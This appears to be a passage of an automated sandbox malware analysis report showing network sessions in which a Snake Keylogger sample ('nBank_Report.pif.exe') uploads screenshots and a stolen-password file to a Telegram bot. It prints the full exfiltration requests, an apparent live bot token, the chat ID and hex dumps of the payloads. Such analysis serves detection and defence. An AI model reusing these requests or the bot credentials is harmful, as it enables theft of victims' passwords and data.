                                              2024-09-26 09:34:16 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 39 31 37 30 39 38 65 32 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce0917098e23cContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:16 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:16 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:16 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:16 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:16 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:16 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:16 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:16 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:16 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:18 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:17 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.1049762149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:18 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce0c5aec617dd
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:18 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 63 35 61 65 63 36 31 37 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce0c5aec617ddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:19 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:19 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:19 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6345,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343259,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.1049763149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:20 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce0e56d11669f
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:20 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 65 35 36 64 31 31 36 36 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce0e56d11669fContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:20 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:20 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:20 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:20 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:20 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
